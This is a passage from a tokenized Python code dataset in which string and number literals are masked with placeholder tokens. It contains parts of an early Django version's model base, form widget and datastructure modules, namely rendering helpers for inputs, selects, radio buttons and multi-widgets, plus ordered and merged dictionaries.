rel , OneToOneRel ) : <EOL> try : <EOL> sub_obj = getattr ( self , rel_opts_name ) <EOL> except ObjectDoesNotExist : <EOL> pass <EOL> else : <EOL> sub_obj . _collect_sub_objects ( seen_objs , self . __class__ , related . field . null ) <EOL> else : <EOL> for cls in self . __class__ . mro ( ) : <EOL> if rel_opts_name in cls . __dict__ : <EOL> rel_descriptor = cls . __dict__ [ rel_opts_name ] <EOL> break <EOL> else : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> delete_qs = rel_descriptor . delete_manager ( self ) . all ( ) <EOL> for sub_obj in delete_qs : <EOL> sub_obj . _collect_sub_objects ( seen_objs , self . __class__ , related . field . null ) <EOL> parent_stack = [ p for p in self . _meta . parents . values ( ) if p is not None ] <EOL> while parent_stack : <EOL> link = parent_stack . pop ( ) <EOL> parent_obj = getattr ( self , link . name ) <EOL> if parent_obj . _meta . parents : <EOL> parent_stack . extend ( parent_obj . _meta . parents . values ( ) ) <EOL> continue <EOL> parent_obj . _collect_sub_objects ( seen_objs ) <EOL> def delete ( self ) : <EOL> assert self . _get_pk_val ( ) is not None , "<STR_LIT>" % ( self . _meta . object_name , self . _meta . pk . attname ) <EOL> seen_objs = CollectedObjects ( ) <EOL> self . _collect_sub_objects ( seen_objs ) <EOL> delete_objects ( seen_objs ) <EOL> delete . alters_data = True <EOL> def _get_FIELD_display ( self , field ) : <EOL> value = getattr ( self , field . attname ) <EOL> return force_unicode ( dict ( field . flatchoices ) . get ( value , value ) , strings_only = True ) <EOL> def _get_next_or_previous_by_FIELD ( self , field , is_next , ** kwargs ) : <EOL> op = is_next and '<STR_LIT>' or '<STR_LIT>' <EOL> order = not is_next and '<STR_LIT:->' or '<STR_LIT>' <EOL> param = smart_str ( getattr ( self , field . attname ) ) <EOL> q = Q ( ** { '<STR_LIT>' % ( field . name , op ) : param } ) <EOL> q = q | Q ( ** { field . name : param , '<STR_LIT>' % op : self . pk } ) <EOL> qs = self . __class__ . 
_default_manager . filter ( ** kwargs ) . filter ( q ) . order_by ( '<STR_LIT>' % ( order , field . name ) , '<STR_LIT>' % order ) <EOL> try : <EOL> return qs [ <NUM_LIT:0> ] <EOL> except IndexError : <EOL> raise self . DoesNotExist , "<STR_LIT>" % self . __class__ . _meta . object_name <EOL> def _get_next_or_previous_in_order ( self , is_next ) : <EOL> cachename = "<STR_LIT>" % is_next <EOL> if not hasattr ( self , cachename ) : <EOL> qn = connection . ops . quote_name <EOL> op = is_next and '<STR_LIT:>>' or '<STR_LIT:<>' <EOL> order = not is_next and '<STR_LIT>' or '<STR_LIT>' <EOL> order_field = self . _meta . order_with_respect_to <EOL> where = [ '<STR_LIT>' % ( qn ( '<STR_LIT>' ) , op , qn ( '<STR_LIT>' ) , <EOL> qn ( self . _meta . db_table ) , qn ( self . _meta . pk . column ) ) ] <EOL> params = [ self . pk ] <EOL> obj = self . _default_manager . filter ( ** { order_field . name : getattr ( self , order_field . attname ) } ) . extra ( where = where , params = params ) . order_by ( order ) [ : <NUM_LIT:1> ] . get ( ) <EOL> setattr ( self , cachename , obj ) <EOL> return getattr ( self , cachename ) <EOL> def prepare_database_save ( self , unused ) : <EOL> return self . pk <EOL> def method_set_order ( ordered_obj , self , id_list ) : <EOL> rel_val = getattr ( self , ordered_obj . _meta . order_with_respect_to . rel . field_name ) <EOL> order_name = ordered_obj . _meta . order_with_respect_to . name <EOL> for i , j in enumerate ( id_list ) : <EOL> ordered_obj . objects . filter ( ** { '<STR_LIT>' : j , order_name : rel_val } ) . update ( _order = i ) <EOL> transaction . commit_unless_managed ( ) <EOL> def method_get_order ( ordered_obj , self ) : <EOL> rel_val = getattr ( self , ordered_obj . _meta . order_with_respect_to . rel . field_name ) <EOL> order_name = ordered_obj . _meta . order_with_respect_to . name <EOL> pk_name = ordered_obj . _meta . pk . name <EOL> return [ r [ pk_name ] for r in <EOL> ordered_obj . objects . 
filter ( ** { order_name : rel_val } ) . values ( pk_name ) ] <EOL> def get_absolute_url ( opts , func , self , * args , ** kwargs ) : <EOL> return settings . ABSOLUTE_URL_OVERRIDES . get ( '<STR_LIT>' % ( opts . app_label , opts . module_name ) , func ) ( self , * args , ** kwargs ) <EOL> class Empty ( object ) : <EOL> pass <EOL> def model_unpickle ( model , attrs ) : <EOL> """<STR_LIT>""" <EOL> from django . db . models . query_utils import deferred_class_factory <EOL> cls = deferred_class_factory ( model , attrs ) <EOL> return cls . __new__ ( cls ) <EOL> model_unpickle . __safe_for_unpickle__ = True <EOL> if sys . version_info < ( <NUM_LIT:2> , <NUM_LIT:5> ) : <EOL> def subclass_exception ( name , parent , unused ) : <EOL> return types . ClassType ( name , ( parent , ) , { } ) <EOL> else : <EOL> def subclass_exception ( name , parent , module ) : <EOL> return type ( name , ( parent , ) , { '<STR_LIT>' : module } ) </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> set <EOL> except NameError : <EOL> from sets import Set as set <EOL> import copy <EOL> from itertools import chain <EOL> from django . conf import settings <EOL> from django . utils . datastructures import MultiValueDict , MergeDict <EOL> from django . utils . html import escape , conditional_escape <EOL> from django . utils . translation import ugettext <EOL> from django . utils . encoding import StrAndUnicode , force_unicode <EOL> from django . utils . safestring import mark_safe <EOL> from django . utils import datetime_safe <EOL> from datetime import time <EOL> from util import flatatt <EOL> from urlparse import urljoin <EOL> __all__ = ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> MEDIA_TYPES = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> class Media ( StrAndUnicode ) : <EOL> def __init__ ( self , media = None , ** kwargs ) : <EOL> if media : <EOL> media_attrs = media . __dict__ <EOL> else : <EOL> media_attrs = kwargs <EOL> self . _css = { } <EOL> self . _js = [ ] <EOL> for name in MEDIA_TYPES : <EOL> getattr ( self , '<STR_LIT>' + name ) ( media_attrs . get ( name , None ) ) <EOL> def __unicode__ ( self ) : <EOL> return self . render ( ) <EOL> def render ( self ) : <EOL> return mark_safe ( u'<STR_LIT:\n>' . join ( chain ( * [ getattr ( self , '<STR_LIT>' + name ) ( ) for name in MEDIA_TYPES ] ) ) ) <EOL> def render_js ( self ) : <EOL> return [ u'<STR_LIT>' % self . absolute_path ( path ) for path in self . _js ] <EOL> def render_css ( self ) : <EOL> media = self . _css . keys ( ) <EOL> media . sort ( ) <EOL> return chain ( * [ <EOL> [ u'<STR_LIT>' % ( self . absolute_path ( path ) , medium ) <EOL> for path in self . 
_css [ medium ] ] <EOL> for medium in media ] ) <EOL> def absolute_path ( self , path ) : <EOL> if path . startswith ( u'<STR_LIT>' ) or path . startswith ( u'<STR_LIT>' ) or path . startswith ( u'<STR_LIT:/>' ) : <EOL> return path <EOL> return urljoin ( settings . MEDIA_URL , path ) <EOL> def __getitem__ ( self , name ) : <EOL> "<STR_LIT>" <EOL> if name in MEDIA_TYPES : <EOL> return Media ( ** { str ( name ) : getattr ( self , '<STR_LIT:_>' + name ) } ) <EOL> raise KeyError ( '<STR_LIT>' % name ) <EOL> def add_js ( self , data ) : <EOL> if data : <EOL> self . _js . extend ( [ path for path in data if path not in self . _js ] ) <EOL> def add_css ( self , data ) : <EOL> if data : <EOL> for medium , paths in data . items ( ) : <EOL> self . _css . setdefault ( medium , [ ] ) . extend ( [ path for path in paths if path not in self . _css [ medium ] ] ) <EOL> def __add__ ( self , other ) : <EOL> combined = Media ( ) <EOL> for name in MEDIA_TYPES : <EOL> getattr ( combined , '<STR_LIT>' + name ) ( getattr ( self , '<STR_LIT:_>' + name , None ) ) <EOL> getattr ( combined , '<STR_LIT>' + name ) ( getattr ( other , '<STR_LIT:_>' + name , None ) ) <EOL> return combined <EOL> def media_property ( cls ) : <EOL> def _media ( self ) : <EOL> if hasattr ( super ( cls , self ) , '<STR_LIT>' ) : <EOL> base = super ( cls , self ) . media <EOL> else : <EOL> base = Media ( ) <EOL> definition = getattr ( cls , '<STR_LIT>' , None ) <EOL> if definition : <EOL> extend = getattr ( definition , '<STR_LIT>' , True ) <EOL> if extend : <EOL> if extend == True : <EOL> m = base <EOL> else : <EOL> m = Media ( ) <EOL> for medium in extend : <EOL> m = m + base [ medium ] <EOL> return m + Media ( definition ) <EOL> else : <EOL> return Media ( definition ) <EOL> else : <EOL> return base <EOL> return property ( _media ) <EOL> class MediaDefiningClass ( type ) : <EOL> "<STR_LIT>" <EOL> def __new__ ( cls , name , bases , attrs ) : <EOL> new_class = super ( MediaDefiningClass , cls ) . 
__new__ ( cls , name , bases , <EOL> attrs ) <EOL> if '<STR_LIT>' not in attrs : <EOL> new_class . media = media_property ( new_class ) <EOL> return new_class <EOL> class Widget ( object ) : <EOL> __metaclass__ = MediaDefiningClass <EOL> is_hidden = False <EOL> needs_multipart_form = False <EOL> def __init__ ( self , attrs = None ) : <EOL> if attrs is not None : <EOL> self . attrs = attrs . copy ( ) <EOL> else : <EOL> self . attrs = { } <EOL> def __deepcopy__ ( self , memo ) : <EOL> obj = copy . copy ( self ) <EOL> obj . attrs = self . attrs . copy ( ) <EOL> memo [ id ( self ) ] = obj <EOL> return obj <EOL> def render ( self , name , value , attrs = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def build_attrs ( self , extra_attrs = None , ** kwargs ) : <EOL> "<STR_LIT>" <EOL> attrs = dict ( self . attrs , ** kwargs ) <EOL> if extra_attrs : <EOL> attrs . update ( extra_attrs ) <EOL> return attrs <EOL> def value_from_datadict ( self , data , files , name ) : <EOL> """<STR_LIT>""" <EOL> return data . get ( name , None ) <EOL> def _has_changed ( self , initial , data ) : <EOL> """<STR_LIT>""" <EOL> if data is None : <EOL> data_value = u'<STR_LIT>' <EOL> else : <EOL> data_value = data <EOL> if initial is None : <EOL> initial_value = u'<STR_LIT>' <EOL> else : <EOL> initial_value = initial <EOL> if force_unicode ( initial_value ) != force_unicode ( data_value ) : <EOL> return True <EOL> return False <EOL> def id_for_label ( self , id_ ) : <EOL> """<STR_LIT>""" <EOL> return id_ <EOL> id_for_label = classmethod ( id_for_label ) <EOL> class Input ( Widget ) : <EOL> """<STR_LIT>""" <EOL> input_type = None <EOL> def render ( self , name , value , attrs = None ) : <EOL> if value is None : value = '<STR_LIT>' <EOL> final_attrs = self . build_attrs ( attrs , type = self . 
input_type , name = name ) <EOL> if value != '<STR_LIT>' : <EOL> final_attrs [ '<STR_LIT:value>' ] = force_unicode ( value ) <EOL> return mark_safe ( u'<STR_LIT>' % flatatt ( final_attrs ) ) <EOL> class TextInput ( Input ) : <EOL> input_type = '<STR_LIT:text>' <EOL> class PasswordInput ( Input ) : <EOL> input_type = '<STR_LIT:password>' <EOL> def __init__ ( self , attrs = None , render_value = True ) : <EOL> super ( PasswordInput , self ) . __init__ ( attrs ) <EOL> self . render_value = render_value <EOL> def render ( self , name , value , attrs = None ) : <EOL> if not self . render_value : value = None <EOL> return super ( PasswordInput , self ) . render ( name , value , attrs ) <EOL> class HiddenInput ( Input ) : <EOL> input_type = '<STR_LIT>' <EOL> is_hidden = True <EOL> class MultipleHiddenInput ( HiddenInput ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , attrs = None , choices = ( ) ) : <EOL> super ( MultipleHiddenInput , self ) . __init__ ( attrs ) <EOL> self . choices = choices <EOL> def render ( self , name , value , attrs = None , choices = ( ) ) : <EOL> if value is None : value = [ ] <EOL> final_attrs = self . build_attrs ( attrs , type = self . input_type , name = name ) <EOL> return mark_safe ( u'<STR_LIT:\n>' . join ( [ ( u'<STR_LIT>' % <EOL> flatatt ( dict ( value = force_unicode ( v ) , ** final_attrs ) ) ) <EOL> for v in value ] ) ) <EOL> def value_from_datadict ( self , data , files , name ) : <EOL> if isinstance ( data , ( MultiValueDict , MergeDict ) ) : <EOL> return data . getlist ( name ) <EOL> return data . get ( name , None ) <EOL> class FileInput ( Input ) : <EOL> input_type = '<STR_LIT:file>' <EOL> needs_multipart_form = True <EOL> def render ( self , name , value , attrs = None ) : <EOL> return super ( FileInput , self ) . render ( name , None , attrs = attrs ) <EOL> def value_from_datadict ( self , data , files , name ) : <EOL> "<STR_LIT>" <EOL> return files . 
get ( name , None ) <EOL> def _has_changed ( self , initial , data ) : <EOL> if data is None : <EOL> return False <EOL> return True <EOL> class Textarea ( Widget ) : <EOL> def __init__ ( self , attrs = None ) : <EOL> self . attrs = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> if attrs : <EOL> self . attrs . update ( attrs ) <EOL> def render ( self , name , value , attrs = None ) : <EOL> if value is None : value = '<STR_LIT>' <EOL> final_attrs = self . build_attrs ( attrs , name = name ) <EOL> return mark_safe ( u'<STR_LIT>' % ( flatatt ( final_attrs ) , <EOL> conditional_escape ( force_unicode ( value ) ) ) ) <EOL> class DateInput ( Input ) : <EOL> input_type = '<STR_LIT:text>' <EOL> format = '<STR_LIT>' <EOL> def __init__ ( self , attrs = None , format = None ) : <EOL> super ( DateInput , self ) . __init__ ( attrs ) <EOL> if format : <EOL> self . format = format <EOL> def _format_value ( self , value ) : <EOL> if value is None : <EOL> return '<STR_LIT>' <EOL> elif hasattr ( value , '<STR_LIT>' ) : <EOL> value = datetime_safe . new_date ( value ) <EOL> return value . strftime ( self . format ) <EOL> return value <EOL> def render ( self , name , value , attrs = None ) : <EOL> value = self . _format_value ( value ) <EOL> return super ( DateInput , self ) . render ( name , value , attrs ) <EOL> def _has_changed ( self , initial , data ) : <EOL> return super ( DateInput , self ) . _has_changed ( self . _format_value ( initial ) , data ) <EOL> class DateTimeInput ( Input ) : <EOL> input_type = '<STR_LIT:text>' <EOL> format = '<STR_LIT>' <EOL> def __init__ ( self , attrs = None , format = None ) : <EOL> super ( DateTimeInput , self ) . __init__ ( attrs ) <EOL> if format : <EOL> self . format = format <EOL> def _format_value ( self , value ) : <EOL> if value is None : <EOL> return '<STR_LIT>' <EOL> elif hasattr ( value , '<STR_LIT>' ) : <EOL> value = datetime_safe . new_datetime ( value ) <EOL> return value . strftime ( self . 
format ) <EOL> return value <EOL> def render ( self , name , value , attrs = None ) : <EOL> value = self . _format_value ( value ) <EOL> return super ( DateTimeInput , self ) . render ( name , value , attrs ) <EOL> def _has_changed ( self , initial , data ) : <EOL> return super ( DateTimeInput , self ) . _has_changed ( self . _format_value ( initial ) , data ) <EOL> class TimeInput ( Input ) : <EOL> input_type = '<STR_LIT:text>' <EOL> format = '<STR_LIT>' <EOL> def __init__ ( self , attrs = None , format = None ) : <EOL> super ( TimeInput , self ) . __init__ ( attrs ) <EOL> if format : <EOL> self . format = format <EOL> def _format_value ( self , value ) : <EOL> if value is None : <EOL> return '<STR_LIT>' <EOL> elif hasattr ( value , '<STR_LIT>' ) : <EOL> return value . strftime ( self . format ) <EOL> return value <EOL> def render ( self , name , value , attrs = None ) : <EOL> value = self . _format_value ( value ) <EOL> return super ( TimeInput , self ) . render ( name , value , attrs ) <EOL> def _has_changed ( self , initial , data ) : <EOL> return super ( TimeInput , self ) . _has_changed ( self . _format_value ( initial ) , data ) <EOL> class CheckboxInput ( Widget ) : <EOL> def __init__ ( self , attrs = None , check_test = bool ) : <EOL> super ( CheckboxInput , self ) . __init__ ( attrs ) <EOL> self . check_test = check_test <EOL> def render ( self , name , value , attrs = None ) : <EOL> final_attrs = self . build_attrs ( attrs , type = '<STR_LIT>' , name = name ) <EOL> try : <EOL> result = self . 
check_test ( value ) <EOL> except : <EOL> result = False <EOL> if result : <EOL> final_attrs [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if value not in ( '<STR_LIT>' , True , False , None ) : <EOL> final_attrs [ '<STR_LIT:value>' ] = force_unicode ( value ) <EOL> return mark_safe ( u'<STR_LIT>' % flatatt ( final_attrs ) ) <EOL> def value_from_datadict ( self , data , files , name ) : <EOL> if name not in data : <EOL> return False <EOL> return super ( CheckboxInput , self ) . value_from_datadict ( data , files , name ) <EOL> def _has_changed ( self , initial , data ) : <EOL> return bool ( initial ) != bool ( data ) <EOL> class Select ( Widget ) : <EOL> def __init__ ( self , attrs = None , choices = ( ) ) : <EOL> super ( Select , self ) . __init__ ( attrs ) <EOL> self . choices = list ( choices ) <EOL> def render ( self , name , value , attrs = None , choices = ( ) ) : <EOL> if value is None : value = '<STR_LIT>' <EOL> final_attrs = self . build_attrs ( attrs , name = name ) <EOL> output = [ u'<STR_LIT>' % flatatt ( final_attrs ) ] <EOL> options = self . render_options ( choices , [ value ] ) <EOL> if options : <EOL> output . append ( options ) <EOL> output . append ( '<STR_LIT>' ) <EOL> return mark_safe ( u'<STR_LIT:\n>' . join ( output ) ) <EOL> def render_options ( self , choices , selected_choices ) : <EOL> def render_option ( option_value , option_label ) : <EOL> option_value = force_unicode ( option_value ) <EOL> selected_html = ( option_value in selected_choices ) and u'<STR_LIT>' or '<STR_LIT>' <EOL> return u'<STR_LIT>' % ( <EOL> escape ( option_value ) , selected_html , <EOL> conditional_escape ( force_unicode ( option_label ) ) ) <EOL> selected_choices = set ( [ force_unicode ( v ) for v in selected_choices ] ) <EOL> output = [ ] <EOL> for option_value , option_label in chain ( self . choices , choices ) : <EOL> if isinstance ( option_label , ( list , tuple ) ) : <EOL> output . 
append ( u'<STR_LIT>' % escape ( force_unicode ( option_value ) ) ) <EOL> for option in option_label : <EOL> output . append ( render_option ( * option ) ) <EOL> output . append ( u'<STR_LIT>' ) <EOL> else : <EOL> output . append ( render_option ( option_value , option_label ) ) <EOL> return u'<STR_LIT:\n>' . join ( output ) <EOL> class NullBooleanSelect ( Select ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , attrs = None ) : <EOL> choices = ( ( u'<STR_LIT:1>' , ugettext ( '<STR_LIT>' ) ) , ( u'<STR_LIT:2>' , ugettext ( '<STR_LIT>' ) ) , ( u'<STR_LIT:3>' , ugettext ( '<STR_LIT>' ) ) ) <EOL> super ( NullBooleanSelect , self ) . __init__ ( attrs , choices ) <EOL> def render ( self , name , value , attrs = None , choices = ( ) ) : <EOL> try : <EOL> value = { True : u'<STR_LIT:2>' , False : u'<STR_LIT:3>' , u'<STR_LIT:2>' : u'<STR_LIT:2>' , u'<STR_LIT:3>' : u'<STR_LIT:3>' } [ value ] <EOL> except KeyError : <EOL> value = u'<STR_LIT:1>' <EOL> return super ( NullBooleanSelect , self ) . render ( name , value , attrs , choices ) <EOL> def value_from_datadict ( self , data , files , name ) : <EOL> value = data . get ( name , None ) <EOL> return { u'<STR_LIT:2>' : True , <EOL> True : True , <EOL> '<STR_LIT:True>' : True , <EOL> u'<STR_LIT:3>' : False , <EOL> '<STR_LIT:False>' : False , <EOL> False : False } . get ( value , None ) <EOL> def _has_changed ( self , initial , data ) : <EOL> return bool ( initial ) != bool ( data ) <EOL> class SelectMultiple ( Select ) : <EOL> def render ( self , name , value , attrs = None , choices = ( ) ) : <EOL> if value is None : value = [ ] <EOL> final_attrs = self . build_attrs ( attrs , name = name ) <EOL> output = [ u'<STR_LIT>' % flatatt ( final_attrs ) ] <EOL> options = self . render_options ( choices , value ) <EOL> if options : <EOL> output . append ( options ) <EOL> output . append ( '<STR_LIT>' ) <EOL> return mark_safe ( u'<STR_LIT:\n>' . 
join ( output ) ) <EOL> def value_from_datadict ( self , data , files , name ) : <EOL> if isinstance ( data , ( MultiValueDict , MergeDict ) ) : <EOL> return data . getlist ( name ) <EOL> return data . get ( name , None ) <EOL> def _has_changed ( self , initial , data ) : <EOL> if initial is None : <EOL> initial = [ ] <EOL> if data is None : <EOL> data = [ ] <EOL> if len ( initial ) != len ( data ) : <EOL> return True <EOL> for value1 , value2 in zip ( initial , data ) : <EOL> if force_unicode ( value1 ) != force_unicode ( value2 ) : <EOL> return True <EOL> return False <EOL> class RadioInput ( StrAndUnicode ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , value , attrs , choice , index ) : <EOL> self . name , self . value = name , value <EOL> self . attrs = attrs <EOL> self . choice_value = force_unicode ( choice [ <NUM_LIT:0> ] ) <EOL> self . choice_label = force_unicode ( choice [ <NUM_LIT:1> ] ) <EOL> self . index = index <EOL> def __unicode__ ( self ) : <EOL> if '<STR_LIT:id>' in self . attrs : <EOL> label_for = '<STR_LIT>' % ( self . attrs [ '<STR_LIT:id>' ] , self . index ) <EOL> else : <EOL> label_for = '<STR_LIT>' <EOL> choice_label = conditional_escape ( force_unicode ( self . choice_label ) ) <EOL> return mark_safe ( u'<STR_LIT>' % ( label_for , self . tag ( ) , choice_label ) ) <EOL> def is_checked ( self ) : <EOL> return self . value == self . choice_value <EOL> def tag ( self ) : <EOL> if '<STR_LIT:id>' in self . attrs : <EOL> self . attrs [ '<STR_LIT:id>' ] = '<STR_LIT>' % ( self . attrs [ '<STR_LIT:id>' ] , self . index ) <EOL> final_attrs = dict ( self . attrs , type = '<STR_LIT>' , name = self . name , value = self . choice_value ) <EOL> if self . is_checked ( ) : <EOL> final_attrs [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> return mark_safe ( u'<STR_LIT>' % flatatt ( final_attrs ) ) <EOL> class RadioFieldRenderer ( StrAndUnicode ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , value , attrs , choices ) : <EOL> self . name , self . 
value , self . attrs = name , value , attrs <EOL> self . choices = choices <EOL> def __iter__ ( self ) : <EOL> for i , choice in enumerate ( self . choices ) : <EOL> yield RadioInput ( self . name , self . value , self . attrs . copy ( ) , choice , i ) <EOL> def __getitem__ ( self , idx ) : <EOL> choice = self . choices [ idx ] <EOL> return RadioInput ( self . name , self . value , self . attrs . copy ( ) , choice , idx ) <EOL> def __unicode__ ( self ) : <EOL> return self . render ( ) <EOL> def render ( self ) : <EOL> """<STR_LIT>""" <EOL> return mark_safe ( u'<STR_LIT>' % u'<STR_LIT:\n>' . join ( [ u'<STR_LIT>' <EOL> % force_unicode ( w ) for w in self ] ) ) <EOL> class RadioSelect ( Select ) : <EOL> renderer = RadioFieldRenderer <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> renderer = kwargs . pop ( '<STR_LIT>' , None ) <EOL> if renderer : <EOL> self . renderer = renderer <EOL> super ( RadioSelect , self ) . __init__ ( * args , ** kwargs ) <EOL> def get_renderer ( self , name , value , attrs = None , choices = ( ) ) : <EOL> """<STR_LIT>""" <EOL> if value is None : value = '<STR_LIT>' <EOL> str_value = force_unicode ( value ) <EOL> final_attrs = self . build_attrs ( attrs ) <EOL> choices = list ( chain ( self . choices , choices ) ) <EOL> return self . renderer ( name , str_value , final_attrs , choices ) <EOL> def render ( self , name , value , attrs = None , choices = ( ) ) : <EOL> return self . get_renderer ( name , value , attrs , choices ) . render ( ) <EOL> def id_for_label ( self , id_ ) : <EOL> if id_ : <EOL> id_ += '<STR_LIT>' <EOL> return id_ <EOL> id_for_label = classmethod ( id_for_label ) <EOL> class CheckboxSelectMultiple ( SelectMultiple ) : <EOL> def render ( self , name , value , attrs = None , choices = ( ) ) : <EOL> if value is None : value = [ ] <EOL> has_id = attrs and '<STR_LIT:id>' in attrs <EOL> final_attrs = self . 
build_attrs ( attrs , name = name ) <EOL> output = [ u'<STR_LIT>' ] <EOL> str_values = set ( [ force_unicode ( v ) for v in value ] ) <EOL> for i , ( option_value , option_label ) in enumerate ( chain ( self . choices , choices ) ) : <EOL> if has_id : <EOL> final_attrs = dict ( final_attrs , id = '<STR_LIT>' % ( attrs [ '<STR_LIT:id>' ] , i ) ) <EOL> label_for = u'<STR_LIT>' % final_attrs [ '<STR_LIT:id>' ] <EOL> else : <EOL> label_for = '<STR_LIT>' <EOL> cb = CheckboxInput ( final_attrs , check_test = lambda value : value in str_values ) <EOL> option_value = force_unicode ( option_value ) <EOL> rendered_cb = cb . render ( name , option_value ) <EOL> option_label = conditional_escape ( force_unicode ( option_label ) ) <EOL> output . append ( u'<STR_LIT>' % ( label_for , rendered_cb , option_label ) ) <EOL> output . append ( u'<STR_LIT>' ) <EOL> return mark_safe ( u'<STR_LIT:\n>' . join ( output ) ) <EOL> def id_for_label ( self , id_ ) : <EOL> if id_ : <EOL> id_ += '<STR_LIT>' <EOL> return id_ <EOL> id_for_label = classmethod ( id_for_label ) <EOL> class MultiWidget ( Widget ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , widgets , attrs = None ) : <EOL> self . widgets = [ isinstance ( w , type ) and w ( ) or w for w in widgets ] <EOL> super ( MultiWidget , self ) . __init__ ( attrs ) <EOL> def render ( self , name , value , attrs = None ) : <EOL> if not isinstance ( value , list ) : <EOL> value = self . decompress ( value ) <EOL> output = [ ] <EOL> final_attrs = self . build_attrs ( attrs ) <EOL> id_ = final_attrs . get ( '<STR_LIT:id>' , None ) <EOL> for i , widget in enumerate ( self . widgets ) : <EOL> try : <EOL> widget_value = value [ i ] <EOL> except IndexError : <EOL> widget_value = None <EOL> if id_ : <EOL> final_attrs = dict ( final_attrs , id = '<STR_LIT>' % ( id_ , i ) ) <EOL> output . append ( widget . render ( name + '<STR_LIT>' % i , widget_value , final_attrs ) ) <EOL> return mark_safe ( self . 
format_output ( output ) ) <EOL> def id_for_label ( self , id_ ) : <EOL> if id_ : <EOL> id_ += '<STR_LIT>' <EOL> return id_ <EOL> id_for_label = classmethod ( id_for_label ) <EOL> def value_from_datadict ( self , data , files , name ) : <EOL> return [ widget . value_from_datadict ( data , files , name + '<STR_LIT>' % i ) for i , widget in enumerate ( self . widgets ) ] <EOL> def _has_changed ( self , initial , data ) : <EOL> if initial is None : <EOL> initial = [ u'<STR_LIT>' for x in range ( <NUM_LIT:0> , len ( data ) ) ] <EOL> else : <EOL> if not isinstance ( initial , list ) : <EOL> initial = self . decompress ( initial ) <EOL> for widget , initial , data in zip ( self . widgets , initial , data ) : <EOL> if widget . _has_changed ( initial , data ) : <EOL> return True <EOL> return False <EOL> def format_output ( self , rendered_widgets ) : <EOL> """<STR_LIT>""" <EOL> return u'<STR_LIT>' . join ( rendered_widgets ) <EOL> def decompress ( self , value ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def _get_media ( self ) : <EOL> "<STR_LIT>" <EOL> media = Media ( ) <EOL> for w in self . widgets : <EOL> media = media + w . media <EOL> return media <EOL> media = property ( _get_media ) <EOL> class SplitDateTimeWidget ( MultiWidget ) : <EOL> """<STR_LIT>""" <EOL> date_format = DateInput . format <EOL> time_format = TimeInput . format <EOL> def __init__ ( self , attrs = None , date_format = None , time_format = None ) : <EOL> if date_format : <EOL> self . date_format = date_format <EOL> if time_format : <EOL> self . time_format = time_format <EOL> widgets = ( DateInput ( attrs = attrs , format = self . date_format ) , <EOL> TimeInput ( attrs = attrs , format = self . time_format ) ) <EOL> super ( SplitDateTimeWidget , self ) . __init__ ( widgets , attrs ) <EOL> def decompress ( self , value ) : <EOL> if value : <EOL> return [ value . date ( ) , value . time ( ) . 
replace ( microsecond = <NUM_LIT:0> ) ] <EOL> return [ None , None ] <EOL> class SplitHiddenDateTimeWidget ( SplitDateTimeWidget ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , attrs = None ) : <EOL> widgets = ( HiddenInput ( attrs = attrs ) , HiddenInput ( attrs = attrs ) ) <EOL> super ( SplitDateTimeWidget , self ) . __init__ ( widgets , attrs ) </s>
<s> class MergeDict ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * dicts ) : <EOL> self . dicts = dicts <EOL> def __getitem__ ( self , key ) : <EOL> for dict_ in self . dicts : <EOL> try : <EOL> return dict_ [ key ] <EOL> except KeyError : <EOL> pass <EOL> raise KeyError <EOL> def __copy__ ( self ) : <EOL> return self . __class__ ( * self . dicts ) <EOL> def get ( self , key , default = None ) : <EOL> try : <EOL> return self [ key ] <EOL> except KeyError : <EOL> return default <EOL> def getlist ( self , key ) : <EOL> for dict_ in self . dicts : <EOL> if key in dict_ . keys ( ) : <EOL> return dict_ . getlist ( key ) <EOL> return [ ] <EOL> def items ( self ) : <EOL> item_list = [ ] <EOL> for dict_ in self . dicts : <EOL> item_list . extend ( dict_ . items ( ) ) <EOL> return item_list <EOL> def has_key ( self , key ) : <EOL> for dict_ in self . dicts : <EOL> if key in dict_ : <EOL> return True <EOL> return False <EOL> __contains__ = has_key <EOL> def copy ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __copy__ ( ) <EOL> class SortedDict ( dict ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( cls , * args , ** kwargs ) : <EOL> instance = super ( SortedDict , cls ) . __new__ ( cls , * args , ** kwargs ) <EOL> instance . keyOrder = [ ] <EOL> return instance <EOL> def __init__ ( self , data = None ) : <EOL> if data is None : <EOL> data = { } <EOL> super ( SortedDict , self ) . __init__ ( data ) <EOL> if isinstance ( data , dict ) : <EOL> self . keyOrder = data . keys ( ) <EOL> else : <EOL> self . keyOrder = [ ] <EOL> for key , value in data : <EOL> if key not in self . keyOrder : <EOL> self . keyOrder . append ( key ) <EOL> def __deepcopy__ ( self , memo ) : <EOL> from copy import deepcopy <EOL> return self . __class__ ( [ ( key , deepcopy ( value , memo ) ) <EOL> for key , value in self . iteritems ( ) ] ) <EOL> def __setitem__ ( self , key , value ) : <EOL> super ( SortedDict , self ) . __setitem__ ( key , value ) <EOL> if key not in self . 
